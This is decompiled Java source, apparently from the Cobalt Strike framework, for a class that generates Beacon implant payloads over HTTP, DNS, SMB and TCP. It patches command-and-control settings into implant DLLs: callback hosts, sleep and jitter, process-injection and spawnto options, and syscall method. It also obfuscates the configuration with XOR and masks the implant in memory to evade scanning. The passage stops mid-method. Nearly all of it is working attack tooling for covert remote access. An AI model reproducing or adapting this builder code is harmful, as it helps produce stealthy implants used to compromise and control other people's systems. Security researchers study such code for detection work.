/*
 * Decompiled with CFR 0.152.
 */
package beacon;

import aggressor.AggressorClient;
import beacon.BeaconConstants;
import beacon.BeaconGuardrails;
import beacon.BeaconSyscallMethod;
import beacon.CommandBuilder;
import beacon.Settings;
import beacon.setup.BeaconDLL;
import beacon.setup.ProcessInject;
import c2profile.Profile;
import common.AssertUtils;
import common.CommonUtils;
import common.MudgeSanity;
import common.Packer;
import common.ProxyServer;
import common.ScListener;
import common.SleevedResource;
import dialog.DialogUtils;
import dns.QuickSecurity;
import java.io.IOException;
import java.io.InputStream;
import java.util.Iterator;
import java.util.LinkedList;
import java.util.Stack;
import pe.MalleablePE;
import pe.OBJExecutable;
import pe.PEParser;
import sleep.runtime.Scalar;
import sleep.runtime.SleepUtils;

public class BeaconPayload
extends BeaconConstants {
    public static final int EXIT_FUNC_PROCESS = 0;
    public static final int EXIT_FUNC_THREAD = 1;
    private final int D = 16384;
    protected Profile c2profile = null;
    protected MalleablePE pe = null;
    protected byte[] publickey = new byte[0];
    protected ScListener listener = null;
    protected int funk = 0;
    protected String arch = null;
    protected AggressorClient client = null;
    protected int syscallMethod = -1;
    protected boolean useWinHTTP = false;

    public BeaconPayload(ScListener scListener, AggressorClient aggressorClient, String string, int n, String string2, String string3) {
        this.listener = scListener;
        this.c2profile = scListener.getProfile();
        this.publickey = scListener.getPublicKey();
        this.pe = new MalleablePE(this.c2profile);
        this.funk = n;
        this.arch = string;
        this.client = aggressorClient;
        String string4 = this.E(string2);
        this.C(string3);
    }

    private String E(String string) {
        if (!CommonUtils.isNullOrEmpty(string)) {
            this.syscallMethod = BeaconSyscallMethod.getMethodNumber(string);
            if (this.syscallMethod < 0) {
                this.A("The System Call method '" + string + "' is not valid.");
            } else {
                return BeaconSyscallMethod.getMethodName(this.syscallMethod);
            }
        }
        String string2 = this.c2profile.getString(".stage.syscall_method");
        if (!CommonUtils.isNullOrEmpty(string2)) {
            this.syscallMethod = BeaconSyscallMethod.getMethodNumber(string2);
            if (this.syscallMethod < 0) {
                this.A("The System Call method '" + string2 + "' from the profile is not valid.");
            } else {
                return BeaconSyscallMethod.getMethodName(this.syscallMethod);
            }
        }
        this.syscallMethod = BeaconSyscallMethod.getMethodNumber("None");
        return BeaconSyscallMethod.getMethodName(this.syscallMethod);
    }

    private void C(String string) {
        String string2;
        if (!CommonUtils.isNullOrEmpty(string)) {
            if ("wininet".equalsIgnoreCase(string)) {
                this.useWinHTTP = false;
                return;
            }
            if ("winhttp".equalsIgnoreCase(string)) {
                this.useWinHTTP = true;
                return;
            }
            this.A("The HTTP Library '" + string + "' is not valid.");
        }
        if (!CommonUtils.isNullOrEmpty(string2 = this.c2profile.getString(".http-beacon.library"))) {
            if ("wininet".equalsIgnoreCase(string2)) {
                this.useWinHTTP = false;
                return;
            }
            if ("winhttp".equalsIgnoreCase(string2)) {
                this.useWinHTTP = true;
                return;
            }
            this.A("The HTTP Library '" + string2 + "' from the profile is not valid.");
        }
    }

    private void F(String string) {
        if (this.client == null) {
            CommonUtils.print_info(string);
        } else {
            this.client.getScriptEngine().pinfo(string, true);
        }
    }

    private void A(String string) {
        if (this.client == null) {
            CommonUtils.print_warn(string);
        } else {
            this.client.getScriptEngine().pwarn(string, true);
        }
    }

    public static byte[] beacon_obfuscate(byte[] byArray) {
        byte[] byArray2 = new byte[byArray.length];
        for (int i = 0; i < byArray.length; ++i) {
            byArray2[i] = (byte)(byArray[i] ^ 0x2E);
        }
        return byArray2;
    }

    private String C(String string, String string2) {
        String string3 = this.funk == 0 ? "Process" : "Thread";
        String string4 = BeaconSyscallMethod.getMethodName(this.syscallMethod);
        StringBuffer stringBuffer = new StringBuffer();
        stringBuffer.append("Generating Payload: " + this.listener.getName());
        stringBuffer.append(this.B("Type", string));
        stringBuffer.append(this.B("Arch", this.arch));
        stringBuffer.append(this.B("Exit Function", string3));
        stringBuffer.append(this.B("System Call", string4));
        return stringBuffer.toString();
    }

    private String B(String string, String string2) {
        StringBuffer stringBuffer = new StringBuffer();
        stringBuffer.append(" -- ");
        stringBuffer.append(string);
        stringBuffer.append(": ");
        stringBuffer.append(string2);
        return stringBuffer.toString();
    }

    private String A(boolean bl) {
        return this.B("HTTP Library", bl ? "winhttp" : "wininet");
    }

    public BeaconDLL exportBeaconStageHTTP(int n, String string, boolean bl, boolean bl2, String string2) {
        AssertUtils.TestSetValue(this.arch, "x86, x64");
        String string3 = "";
        if (this.useWinHTTP) {
            if ("x86".equals(this.arch)) {
                string3 = "resources/winhttpb.dll";
            } else if ("x64".equals(this.arch)) {
                string3 = "resources/winhttpb.x64.dll";
            }
        } else if ("x86".equals(this.arch)) {
            string3 = "resources/beacon.dll";
        } else if ("x64".equals(this.arch)) {
            string3 = "resources/beacon.x64.dll";
        }
        String string4 = this.C("HTTP", string2);
        string4 = string4 + this.A(this.useWinHTTP);
        this.F(string4);
        BeaconDLL beaconDLL = new BeaconDLL(string3);
        beaconDLL.originalDLL = this.exportBeaconStage(n, string, bl, bl2, string3, string2, this.useWinHTTP);
        beaconDLL.peProcessedDLL = this.pe.process(beaconDLL.originalDLL, this.arch);
        if (this.client != null) {
            beaconDLL.setCustomLoaderSize(this.listener.getCustomLoaderSizeKB(this.client, string3, this.arch));
            if (beaconDLL.usesCustomLoaderSize()) {
                if (this.useWinHTTP) {
                    if ("x86".equals(this.arch)) {
                        beaconDLL.customFileName = "resources/winhttpb" + beaconDLL.getCustomLoaderExtension() + ".dll";
                    } else if ("x64".equals(this.arch)) {
                        beaconDLL.customFileName = "resources/winhttpb.x64" + beaconDLL.getCustomLoaderExtension() + ".dll";
                    }
                } else if ("x86".equals(this.arch)) {
                    beaconDLL.customFileName = "resources/beacon" + beaconDLL.getCustomLoaderExtension() + ".dll";
                } else if ("x64".equals(this.arch)) {
                    beaconDLL.customFileName = "resources/beacon.x64" + beaconDLL.getCustomLoaderExtension() + ".dll";
                }
                beaconDLL.customDLL = this.exportBeaconStage(n, string, bl, bl2, beaconDLL.customFileName, string2, this.useWinHTTP);
            }
        }
        return beaconDLL;
    }

    public BeaconDLL exportBeaconStageDNS(int n, String string, boolean bl, boolean bl2, String string2) {
        AssertUtils.TestSetValue(this.arch, "x86, x64");
        String string3 = "";
        if ("x86".equals(this.arch)) {
            string3 = "resources/dnsb.dll";
        } else if ("x64".equals(this.arch)) {
            string3 = "resources/dnsb.x64.dll";
        }
        String string4 = this.C("DNS", string2);
        this.F(string4);
        BeaconDLL beaconDLL = new BeaconDLL(string3);
        beaconDLL.originalDLL = this.exportBeaconStage(n, string, bl, bl2, string3, string2, false);
        beaconDLL.peProcessedDLL = this.pe.process(beaconDLL.originalDLL, this.arch);
        if (this.client != null) {
            beaconDLL.setCustomLoaderSize(this.listener.getCustomLoaderSizeKB(this.client, string3, this.arch));
            if (beaconDLL.usesCustomLoaderSize()) {
                if ("x86".equals(this.arch)) {
                    beaconDLL.customFileName = "resources/dnsb" + beaconDLL.getCustomLoaderExtension() + ".dll";
                } else if ("x64".equals(this.arch)) {
                    beaconDLL.customFileName = "resources/dnsb.x64" + beaconDLL.getCustomLoaderExtension() + ".dll";
                }
                beaconDLL.customDLL = this.exportBeaconStage(n, string, bl, bl2, beaconDLL.customFileName, string2, false);
            }
        }
        return beaconDLL;
    }

    protected void setupKillDate(Settings settings) {
        settings.addShort(55, this.funk);
        if (!this.c2profile.hasString(".killdate")) {
            settings.addInt(40, 0);
            return;
        }
        String string = this.c2profile.getString(".killdate");
        String[] stringArray = string.split("-");
        int n = (short)CommonUtils.toNumber(stringArray[0], 0) * 10000;
        int n2 = (short)CommonUtils.toNumber(stringArray[1], 0) * 100;
        short s = (short)CommonUtils.toNumber(stringArray[2], 0);
        settings.addInt(40, n + n2 + s);
    }

    public static void setupPivotFrames(Profile profile, Settings settings) {
        byte[] byArray = CommonUtils.toBytes(profile.getString(".tcp_frame_header"));
        byte[] byArray2 = CommonUtils.toBytes(profile.getString(".smb_frame_header"));
        Packer packer = new Packer();
        packer.addShort(byArray.length + 4);
        packer.append(byArray);
        settings.addData(58, packer.getBytes(), 128);
        packer = new Packer();
        packer.addShort(byArray2.length + 4);
        packer.append(byArray2);
        settings.addData(57, packer.getBytes(), 128);
    }

    protected void setupGargle(Settings settings, String string) throws IOException {
        if (!this.c2profile.option(".stage.sleep_mask")) {
            settings.addInt(41, 0);
            return;
        }
        PEParser pEParser = PEParser.load(SleevedResource.readResource(string));
        boolean bl = this.c2profile.option(".stage.obfuscate");
        boolean bl2 = this.c2profile.option(".stage.userwx");
        settings.addInt(41, 1);
        Packer packer = new Packer();
        packer.little();
        if (!bl) {
            packer.addInt(0);
            packer.addInt(4096);
        }
        for (String string2 : pEParser.SectionsTable()) {
            if (".text".equals(string2)) {
                if (!bl2) continue;
                packer.addInt(pEParser.sectionAddress(string2));
                packer.addInt(pEParser.sectionEnd(string2));
                continue;
            }
            packer.addInt(pEParser.sectionAddress(string2));
            packer.addInt(pEParser.sectionEnd(string2));
        }
        packer.addInt(0);
        packer.addInt(0);
        settings.addData(42, packer.getBytes(), (int)packer.size());
    }

    protected void setupMaxRetryStrategy(Settings settings, String string) {
        Object object;
        if (string.matches("exit-\\d+-\\d+-\\d+[m,h,d]")) {
            object = string.split("-");
            int n = CommonUtils.toNumber(object[1], 0);
            int n2 = CommonUtils.toNumber(object[2], 0);
            char c = object[3].charAt(object[3].length() - 1);
            int n3 = CommonUtils.toNumber(object[3].substring(0, object[3].length() - 1), 0);
            int n4 = 60;
            if (c == 'h') {
                n4 = 3600;
            } else if (c == 'd') {
                n4 = 86400;
            }
            if (n > 0 && n3 > 0) {
                settings.addInt(71, n);
                settings.addInt(72, n2);
                settings.addInt(73, n3 * n4);
                return;
            }
        }
        if (!string.equals("none")) {
            object = "Max retry strategy '" + string + "' is not valid, defaulting to none";
            this.A((String)object);
            DialogUtils.showInfo((String)object);
        }
        settings.addInt(71, 0);
        settings.addInt(72, 0);
        settings.addInt(73, 0);
    }

    protected void setupDNS(Settings settings) throws IOException {
        int n = Integer.parseInt(this.c2profile.getString(".dns-beacon.maxdns"));
        if (n < 0 || n > 255) {
            n = 255;
        }
        long l = CommonUtils.ipToLong(this.c2profile.getString(".dns-beacon.dns_idle"));
        int n2 = Integer.parseInt(this.c2profile.getString(".dns-beacon.dns_sleep"));
        settings.addShort(6, n);
        settings.addInt(19, (int)l);
        settings.addInt(20, n2);
        String string = this.c2profile.getString(".dns-beacon.beacon");
        String string2 = this.A(this.c2profile.getString(".dns-beacon.get_A"), "cdn.");
        String string3 = this.A(this.c2profile.getString(".dns-beacon.get_AAAA"), "www6.");
        String string4 = this.A(this.c2profile.getString(".dns-beacon.get_TXT"), "api.");
        String string5 = this.A(this.c2profile.getString(".dns-beacon.put_metadata"), "www.");
        String string6 = this.A(this.c2profile.getString(".dns-beacon.put_output"), "post.");
        settings.addString(60, string, 33);
        settings.addString(61, string2, 33);
        settings.addString(62, string3, 33);
        settings.addString(63, string4, 33);
        settings.addString(64, string5, 33);
        settings.addString(65, string6, 33);
        settings.addString(66, this.listener.getDNSResolverString(), 15);
    }

    private String A(String string, String string2) {
        if (string == null || "".equals(string)) {
            return string2;
        }
        return string;
    }

    protected void setupHTTP(Settings settings, boolean bl, LinkedList linkedList) throws IOException {
        Object object;
        String string = BeaconPayload.randua(this.c2profile);
        String string2 = CommonUtils.pick(this.c2profile.getString(".http-post.uri").split(" "));
        byte[] byArray = this.c2profile.recover_binary(".http-get.server.output");
        byte[] byArray2 = this.c2profile.apply_binary(".http-get.client");
        byte[] byArray3 = this.c2profile.apply_binary(".http-post.client");
        settings.addString(9, string, 256);
        settings.addString(10, string2, 64);
        settings.addData(11, byArray, 256);
        settings.addData(12, byArray2, 512);
        settings.addData(13, byArray3, 512);
        String string3 = this.c2profile.getHeadersToRemove(bl);
        if (string3.length() > 0) {
            settings.addString(59, string3, 64);
        }
        Iterator iterator = linkedList.iterator();
        Packer packer = new Packer();
        int n = 0;
        int n2 = 0;
        while (iterator.hasNext()) {
            object = iterator.next().toString();
            if (n % 2 == 0) {
                long l = packer.size();
                this.c2profile.apply_hp_binary((String)object, packer);
                long l2 = packer.size() - l;
                if (l2 > 0L) {
                    ++n2;
                    this.F("Host Profile patch for '" + (String)object + "' added " + l2 + " bytes.  Total = " + packer.size() + " of " + 1024);
                }
            }
            ++n;
        }
        if (n2 > 8) {
            this.A("Count of host profiles in beacon config (" + n2 + ") exceeds maximum (" + 8 + ").");
            return;
        }
        if (packer.size() > 0L) {
            object = packer.getBytes();
            if (((Object)object).length > 1024) {
                this.A("Length of host profile patch (" + ((Object)object).length + " bytes) exceeds maximum length (" + 1024 + " bytes).");
                return;
            }
            settings.addData(75, (byte[])object, 1024);
        }
    }

    private byte[] B(String string) {
        if (this.client == null) {
            return null;
        }
        Stack<Scalar> stack = new Stack<Scalar>();
        stack.push(SleepUtils.getScalar(this.arch));
        stack.push(SleepUtils.getScalar(string));
        String string2 = this.client.getScriptEngine().format("BEACON_SLEEP_MASK", stack);
        if (string2 != null) {
            if (string2.length() > 0 && string2.length() <= 16384) {
                return CommonUtils.toBytes(string2);
            }
            this.A("The user provided sleep mask for the '" + string + "' type has a size of " + string2.length() + " bytes, which exceeds the size limit of " + 16384 + " bytes. The default sleep mask will be used.");
        }
        return null;
    }

    private byte[] D(String string) {
        String string2 = string.equals("default") ? "resources/sleepmask." + this.arch + ".o" : "resources/sleepmask_" + string + "." + this.arch + ".o";
        byte[] byArray = SleevedResource.readResource(string2);
        OBJExecutable oBJExecutable = new OBJExecutable(byArray, "sleep_mask");
        oBJExecutable.parse();
        CommandBuilder commandBuilder = new CommandBuilder();
        commandBuilder.addInteger(oBJExecutable.getBssSize());
        commandBuilder.addLengthAndString(oBJExecutable.getCode());
        commandBuilder.addLengthAndString(oBJExecutable.getRData());
        commandBuilder.addLengthAndString(oBJExecutable.getData());
        commandBuilder.addLengthAndString(oBJExecutable.getXData());
        commandBuilder.addLengthAndString(oBJExecutable.getPData());
        commandBuilder.addLengthAndString(oBJExecutable.getRelocations());
        commandBuilder.addInteger(oBJExecutable.getEntryPoint());
        commandBuilder.addLengthAndString(new byte[0]);
        if (oBJExecutable.hasErrors()) {
            throw new RuntimeException("linker errors for bof_extract:\n" + oBJExecutable.getErrors());
        }
        return commandBuilder.build();
    }

    protected String patchSleepMaskString(String string, String string2) {
        AssertUtils.TestSetValue(string2, "default, pivot");
        int n = string.indexOf("SSSSLLLLEEEEPPPPMMMMAAAASSSSKKKK");
        byte[] byArray = this.B(string2);
        if (byArray == null) {
            byArray = this.D(string2);
        }
        byArray[0] = (byte)(CommonUtils.rand(252) + 1);
        byArray[1] = (byte)(CommonUtils.rand(252) + 1);
        byArray[2] = (byte)(CommonUtils.rand(252) + 1);
        byArray[3] = (byte)(CommonUtils.rand(252) + 1);
        for (int i = 8; i < byArray.length; ++i) {
            int n2 = i;
            byArray[n2] = (byte)(byArray[n2] ^ byArray[i % 4]);
        }
        byte[] byArray2 = CommonUtils.randomData(16384 - byArray.length);
        String string3 = CommonUtils.bString(CommonUtils.join(byArray, byArray2));
        return CommonUtils.replaceAt(string, string3, n);
    }

    protected byte[] exportBeaconStage(int n, String string, boolean bl, boolean bl2, String string2, String string3, boolean bl3) {
        try {
            Object object;
            Object object2;
            long l = System.currentTimeMillis();
            byte[] byArray = SleevedResource.readResource(string2);
            String[] stringArray = this.c2profile.getString(".http-get.uri").split(" ");
            String[] stringArray2 = string.split(",\\s*");
            LinkedList<String> linkedList = new LinkedList<String>();
            for (int i = 0; i < stringArray2.length; ++i) {
                linkedList.add(stringArray2[i]);
                linkedList.add(CommonUtils.pick(stringArray));
            }
            String string4 = this.listener.getStrategy();
            int n2 = BeaconConstants.getStrategyID(string4);
            if (string4.startsWith("rotate") || string4.startsWith("failover")) {
                n2 = 2;
            }
            int n3 = -1;
            if (string4.startsWith("rotate")) {
                n3 = BeaconConstants.parseStrategyForNumber(string4, "rotate");
            }
            int n4 = -1;
            if (string4.equals("failover")) {
                n4 = 0;
            } else if (string4.startsWith("failover") && string4.endsWith("x")) {
                n4 = BeaconConstants.parseStrategyForNumber(string4, "failover");
            }
            int n5 = -1;
            if (string4.startsWith("failover") && (string4.endsWith("s") || string4.endsWith("m") || string4.endsWith("h") || string4.endsWith("d"))) {
                n5 = BeaconConstants.parseStrategyForNumber(string4, "failover");
            }
            while (linkedList.size() > 2 && CommonUtils.join(linkedList, ",").length() > 255) {
                object2 = linkedList.removeLast() + "";
                String string5 = linkedList.removeLast() + "";
                this.F("dropping " + string5 + (String)object2 + " from Beacon profile for size");
            }
            object2 = this.c2profile.getSleep(true);
            int n6 = this.c2profile.getInt(".tasks_max_size");
            int n7 = this.c2profile.size(".http-get.server.output", n6);
            int n8 = 0;
            if (bl) {
                n8 |= 1;
            }
            if (bl2) {
                n8 |= 8;
            }
            BeaconGuardrails beaconGuardrails = null;
            beaconGuardrails = string3 != null ? new BeaconGuardrails(string3) : new BeaconGuardrails(this.listener);
            Settings settings = new Settings(6144);
            settings.addShort(1, n8);
            settings.addShort(2, n);
            settings.addInt(3, ((Profile.SleepAndJitter)object2).SleepInMilliseconds);
            settings.addInt(4, n7);
            settings.addShort(5, ((Profile.SleepAndJitter)object2).Jitter);
            settings.addData(7, this.publickey, 256);
            settings.addString(8, CommonUtils.join(linkedList, ","), 256);
            settings.addShort(67, n2);
            settings.addInt(68, n3);
            settings.addInt(69, n4);
            settings.addInt(70, n5);
            settings.addData(14, CommonUtils.asBinary(this.c2profile.getString(".spawnto")), 16);
            settings.addString(29, this.c2profile.getString(".post-ex.spawnto_x86"), 64);
            settings.addString(30, this.c2profile.getString(".post-ex.spawnto_x64"), 64);
            settings.addShort(31, QuickSecurity.getCryptoScheme());
            settings.addString(26, this.c2profile.getString(".http-get.verb"), 16);
            settings.addString(27, this.c2profile.getString(".http-post.verb"), 16);
            settings.addInt(28, this.c2profile.shouldChunkPosts() ? 96 : 0);
            settings.addInt(37, this.c2profile.getInt(".watermark"));
            settings.addString(36, this.c2profile.getString(".watermarkHash"), 32);
            settings.addShort(38, this.c2profile.option(".stage.cleanup") ? 1 : 0);
            settings.addShort(39, this.c2profile.exerciseCFGCaution() ? 1 : 0);
            settings.addInt(76, this.c2profile.getInt(".stage.data_store_size"));
            this.setupMaxRetryStrategy(settings, this.listener.getMaxRetryStrategy());
            if (bl) {
                this.setupDNS(settings);
            } else {
                this.setupHTTP(settings, bl3, linkedList);
            }
            String string6 = this.listener.getHostHeader();
            if (string6 == null || string6.length() == 0) {
                settings.addString(54, "", 128);
            } else if (Profile.usesHostBeacon(this.c2profile)) {
                settings.addString(54, "", 128);
            } else {
                settings.addString(54, "Host: " + this.listener.getHostHeader() + "\r\n", 128);
            }
            if (Profile.usesCookieBeacon(this.c2profile)) {
                settings.addShort(50, 1);
            } else {
                settings.addShort(50, 0);
            }
            ProxyServer proxyServer = ProxyServer.parse(this.listener.getProxyString());
            proxyServer.setup(settings);
            BeaconPayload.setupPivotFrames(this.c2profile, settings);
            this.setupKillDate(settings);
            this.setupGargle(settings, string2);
            new ProcessInject(this.c2profile).apply(settings);
            settings.addInt(17, this.syscallMethod);
            byte[] byArray2 = settings.toPatch();
            int n9 = BeaconGuardrails.quickChecksum(byArray2);
            beaconGuardrails.setPayloadChecksum(n9 + 1);
            byArray2 = BeaconPayload.beacon_obfuscate(byArray2);
            byArray2 = beaconGuardrails.hashWithUsername(byArray2);
            byArray2 = beaconGuardrails.hashWithComputer(byArray2);
            byArray2 = beaconGuardrails.hashWithDomain(byArray2);
            byArray2 = beaconGuardrails.hashWithLocalIP(byArray2);
            String string7 = CommonUtils.bString(byArray);
            string7 = this.patchSleepMaskString(string7, "default");
            String string8 = "AAAABBBBCCCCDDDDEEEEFFFF";
            int n10 = string7.indexOf(string8);
            if (n10 > -1) {
                object = CommonUtils.bString(byArray2);
                string7 = CommonUtils.replaceAt(string7, (String)object, n10);
            }
            object = beaconGuardrails.buildGuardSettings();
            string7 = BeaconGuardrails.applyPatch(string7, (Settings)object, byArray2);
            return CommonUtils.toBytes(string7);
        }
        catch (IOException iOException) {
            MudgeSanity.logException("export Beacon stage: " + string2, iOException, false);
            return new byte[0];
        }
    }

    public BeaconDLL exportReverseTCPStage() {
        BeaconDLL beaconDLL = new BeaconDLL();
        beaconDLL.fileName = this.arch.equals("x64") ? "resources/pivot.x64.dll" : "resources/pivot.dll";
        beaconDLL.originalDLL = this.exportTCPDLL(beaconDLL.fileName, "reverse", null);
        beaconDLL.peProcessedDLL = this.pe.process(beaconDLL.originalDLL, this.arch);
        if (this.client != null) {
            beaconDLL.setCustomLoaderSize(this.listener.getCustomLoaderSizeKB(this.client, beaconDLL.fileName, this.arch));
            if (beaconDLL.usesCustomLoaderSize()) {
                if ("x86".equals(this.arch)) {
                    beaconDLL.customFileName = "resources/pivot" + beaconDLL.getCustomLoaderExtension() + ".dll";
                } else if ("x64".equals(this.arch)) {
                    beaconDLL.customFileName = "resources/pivot.x64" + beaconDLL.getCustomLoaderExtension() + ".dll";
                }
                beaconDLL.customDLL = this.exportTCPDLL(beaconDLL.customFileName, "reverse", null);
            }
        }
        return beaconDLL;
    }

    public BeaconDLL exportBindTCPStage(String string) {
        BeaconDLL beaconDLL = new BeaconDLL();
        beaconDLL.fileName = this.arch.equals("x64") ? "resources/pivot.x64.dll" : "resources/pivot.dll";
        beaconDLL.originalDLL = this.exportTCPDLL(beaconDLL.fileName, "bind", string);
        beaconDLL.peProcessedDLL = this.pe.process(beaconDLL.originalDLL, this.arch);
        if (this.client != null) {
            beaconDLL.setCustomLoaderSize(this.listener.getCustomLoaderSizeKB(this.client, beaconDLL.fileName, this.arch));
            if (beaconDLL.usesCustomLoaderSize()) {
                beaconDLL.customFileName = this.arch.equals("x64") ? "resources/pivot.x64" + beaconDLL.getCustomLoaderExtension() + ".dll" : "resources/pivot" + beaconDLL.getCustomLoaderExtension() + ".dll";
                beaconDLL.customDLL = this.exportTCPDLL(beaconDLL.customFileName, "bind", string);
            }
        }
        return beaconDLL;
    }

    public BeaconDLL exportSMBStage(String string) {
        BeaconDLL beaconDLL = new BeaconDLL();
        beaconDLL.fileName = this.arch.equals("x64") ? "resources/pivot.x64.dll" : "resources/pivot.dll";
        beaconDLL.originalDLL = this.A(beaconDLL.fileName, false, string);
        beaconDLL.peProcessedDLL = this.pe.process(beaconDLL.originalDLL, this.arch);
        beaconDLL.setCustomLoaderSize(this.listener.getCustomLoaderSizeKB(this.client, beaconDLL.fileName, this.arch));
        if (this.client != null && beaconDLL.usesCustomLoaderSize()) {
            beaconDLL.customFileName = this.arch.equals("x64") ? "resources/pivot.x64" + beaconDLL.getCustomLoaderExtension() + ".dll" : "resources/pivot" + beaconDLL.getCustomLoaderExtension() + ".dll";
            beaconDLL.customDLL = this.A(beaconDLL.customFileName, false, string);
        }
        return beaconDLL;
    }

    public BeaconDLL exportExternalC2Stage() {
        BeaconDLL beaconDLL = new BeaconDLL();
        beaconDLL.fileName = this.arch.equals("x64") ? "resources/extc2.x64.dll" : "resources/extc2.dll";
        beaconDLL.originalDLL = this.A(beaconDLL.fileName, true, null);
        beaconDLL.peProcessedDLL = this.pe.process(beaconDLL.originalDLL, this.arch);
        if (this.client != null) {
            beaconDLL.setCustomLoaderSize(this.listener.getCustomLoaderSizeKB(this.client, beaconDLL.fileName, this.arch));
            if (beaconDLL.usesCustomLoaderSize()) {
                beaconDLL.customFileName = this.arch.equals("x64") ? "resources/extc2.x64" + beaconDLL.getCustomLoaderExtension() + ".dll" : "resources/extc2" + beaconDLL.getCustomLoaderExtension() + ".dll";
                beaconDLL.customDLL = this.A(beaconDLL.customFileName, true, null);
            }
        }
        return beaconDLL;
    }

    private byte[] A(String string, boolean bl, String string2) {
        try {
            Object object;
            String string3 = this.C("SMB", string2);
            this.F(string3);
            long l = System.currentTimeMillis();
            byte[] byArray = SleevedResource.readResource(string);
            String string4 = this.listener.getPipeName(".");
            BeaconGuardrails beaconGuardrails = null;
            beaconGuardrails = string2 != null ? new BeaconGuardrails(string2) : new BeaconGuardrails(this.listener);
            Settings settings = new Settings(6144);
            settings.addShort(1, 2);
            settings.addShort(2, 4444);
            settings.addInt(3, 10000);
            settings.addInt(4, this.c2profile.getInt(".tasks_max_size"));
            settings.addShort(5, 0);
            settings.addShort(6, 0);
            settings.addData(7, this.publickey, 256);
            settings.addString(8, "", 256);
            settings.addString(9, "", 128);
            settings.addString(10, "", 64);
            settings.addString(11, "", 256);
            settings.addString(12, "", 256);
            settings.addString(13, "", 256);
            settings.addData(14, CommonUtils.asBinary(this.c2profile.getString(".spawnto")), 16);
            settings.addString(29, this.c2profile.getString(".post-ex.spawnto_x86"), 64);
            settings.addString(30, this.c2profile.getString(".post-ex.spawnto_x64"), 64);
            settings.addString(15, string4, 128);
            settings.addShort(31, QuickSecurity.getCryptoScheme());
            this.setupKillDate(settings);
            settings.addInt(37, this.c2profile.getInt(".watermark"));
            settings.addString(36, this.c2profile.getString(".watermarkHash"), 32);
            settings.addShort(38, this.c2profile.option(".stage.cleanup") ? 1 : 0);
            settings.addShort(39, this.c2profile.exerciseCFGCaution() ? 1 : 0);
            settings.addInt(76, this.c2profile.getInt(".stage.data_store_size"));
            this.setupGargle(settings, string);
            BeaconPayload.setupPivotFrames(this.c2profile, settings);
            new ProcessInject(this.c2profile).apply(settings);
            settings.addInt(17, this.syscallMethod);
            byte[] byArray2 = settings.toPatch();
            int n = BeaconGuardrails.quickChecksum(byArray2);
            beaconGuardrails.setPayloadChecksum(n + 1);
            byArray2 = BeaconPayload.beacon_obfuscate(byArray2);
            byArray2 = beaconGuardrails.hashWithUsername(byArray2);
            byArray2 = beaconGuardrails.hashWithComputer(byArray2);
            byArray2 = beaconGuardrails.hashWithDomain(byArray2);
            byArray2 = beaconGuardrails.hashWithLocalIP(byArray2);
            String string5 = CommonUtils.bString(byArray);
            string5 = this.patchSleepMaskString(string5, "pivot");
            String string6 = "AAAABBBBCCCCDDDDEEEEFFFF";
            int n2 = string5.indexOf(string6);
            if (n2 > -1) {
                object = CommonUtils.bString(byArray2);
                string5 = CommonUtils.replaceAt(string5, (String)object, n2);
            }
            object = beaconGuardrails.buildGuardSettings();
            string5 = BeaconGuardrails.applyPatch(string5, (Settings)object, byArray2);
            return CommonUtils.toBytes(string5);
        }
        catch (IOException iOException) {
            MudgeSanity.logException("export SMB DLL", iOException, false);
            return new byte[0];
        }
    }

    public byte[] exportTCPDLL(String string, String string2, String string3) {
        AssertUtils.TestSetValue(string2, "bind, reverse");
        String string4 = this.C("TCP", string3);
        this.F(string4);
        try {
            Object object;
            long l = System.currentTimeMillis();
            byte[] byArray = SleevedResource.readResource(string);
            BeaconGuardrails beaconGuardrails = null;
            beaconGuardrails = string3 != null ? new BeaconGuardrails(string3) : new BeaconGuardrails(this.listener);
            Settings settings = new Settings(6144);
            if ("bind".equals(string2)) {
                settings.addShort(1, 16);
            } else {
                settings.addShort(1, 4);
            }
            settings.addShort(2, this.listener.getPort());
            settings.addInt(3, 10000);
            settings.addInt(4, this.c2profile.getInt(".tasks_max_size"));
            settings.addShort(5, 0);
            settings.addShort(6, 0);
            settings.addData(7, this.publickey, 256);
            if ("bind".equals(string2)) {
                if (this.listener.isLocalHostOnly()) {
                    settings.addInt(49, (int)CommonUtils.ipToLong("127.0.0.1"));
                } else {
                    settings.addInt(49, (int)CommonUtils.ipToLong("0.0.0.0"));
                }
            } else {
                settings.addString(8, this.listener.getStagerHost(), 256);
            }
            settings.addString(9, "", 128);
            settings.addString(10, "", 64);
            settings.addString(11, "", 256);
            settings.addString(12, "", 256);
            settings.addString(13, "", 256);
            settings.addData(14, CommonUtils.asBinary(this.c2profile.getString(".spawnto")), 16);
            settings.addString(29, this.c2profile.getString(".post-ex.spawnto_x86"), 64);
            settings.addString(30, this.c2profile.getString(".post-ex.spawnto_x64"), 64);
            settings.addString(15, "", 128);
            settings.addShort(31, QuickSecurity.getCryptoScheme());
            this.setupKillDate(settings);
            settings.addInt(37, this.c2profile.getInt(".watermark"));
            settings.addString(36, this.c2profile.getString(".watermarkHash"), 32);
            settings.addShort(38, this.c2profile.option(".stage.cleanup") ? 1 : 0);
            settings.addShort(39, this.c2profile.exerciseCFGCaution() ? 1 : 0);
            settings.addInt(76, this.c2profile.getInt(".stage.data_store_size"));
            this.setupGargle(settings, string);
            BeaconPayload.setupPivotFrames(this.c2profile, settings);
            new ProcessInject(this.c2profile).apply(settings);
            settings.addInt(17, this.syscallMethod);
            byte[] byArray2 = settings.toPatch();
            int n = BeaconGuardrails.quickChecksum(byArray2);
            beaconGuardrails.setPayloadChecksum(n + 1);
            byArray2 = BeaconPayload.beacon_obfuscate(byArray2);
            byArray2 = beaconGuardrails.hashWithUsername(byArray2);
            byArray2 = beaconGuardrails.hashWithComputer(byArray2);
            byArray2 = beaconGuardrails.hashWithDomain(byArray2);
            byArray2 = beaconGuardrails.hashWithLocalIP(byArray2);
            String string5 = CommonUtils.bString(byArray);
            string5 = this.patchSleepMaskString(string5, "pivot");
            String string6 = "AAAABBBBCCCCDDDDEEEEFFFF";
            int n2 = string5.indexOf(string6);
            if (n2 > -1) {
                object = CommonUtils.bString(byArray2);
                string5 = CommonUtils.replaceAt(string5, (String)object, n2);
            }
            object = beaconGuardrails.buildGuardSettings();
            string5 = BeaconGuardrails.applyPatch(string5, (Settings)object, byArray2);
            return CommonUtils.toBytes(string5);
        }
        catch (IOException iOException) {
            MudgeSanity.logException("export TCP DLL", iOException, false);
            return new byte[0];
        }
    }

    public static String randua(Profile profile) {
        if (profile.getString(".useragent").equals("<RAND>")) {
            try {
                InputStream inputStream = CommonUtils.resource("resources/ua.txt");
